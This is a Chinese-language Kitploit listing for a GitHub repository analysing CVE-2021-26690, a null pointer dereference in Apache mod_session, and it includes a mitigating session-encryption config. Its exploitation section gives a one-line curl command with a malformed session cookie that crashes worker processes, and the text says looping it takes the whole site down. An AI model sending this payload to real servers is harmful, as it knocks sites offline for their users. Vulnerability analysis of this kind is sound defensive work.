Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-26690---Apache-mod_session — CVE-2021-26690 补丁差异分析 - Apache HTTP mod_session 空指针解引用 | Kitploit
工具/GitHubGitHub/7own/cve-2021-26690---apache-mod_session
漏洞分析漏洞利用Web安全渗透测试
GitHub7own/cve-2021-26690---apache-mod_session

CVE-2021-26690---Apache-mod_session

CVE-2021-26690 补丁差异分析 - Apache HTTP mod_session 空指针解引用

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
111年前尚未审核

对 CVE-2021-26690 的补丁差异分析 - Apache mod_session

此漏洞是 Apache 的 mod_session 模块中的空指针解引用。 它将导致 Apache httpd 的子进程拒绝服务。 通过使用重复循环,每个 Apache worker 都会崩溃,从而导致所有连接或已连接到该网站的客户端拒绝服务。

该漏洞最初由 @antonio-morales 发现。

有关完整过程,请参阅本仓库中的 PDF。

限制

如果服务器通过 mod_session_crypto 实现了 SessionCryptoPassphrase 选项,则 cookie 将被加密并进行 base64 编码。

root@kitploit:~
<IfModule mod_session.c>
Session On
SessionCookieName session path=/
SessionCryptoPassphrase "YourSecurePassphrase"
SessionMaxAge 1800
</IfModule>

在这种情况下,会话 cookie 对无法被篡改,因此不会发生此拒绝服务攻击。

利用

root@kitploit:~
curl http://$IP:$PORT/ -v -b 'session=expiry=123456789&='
下载工具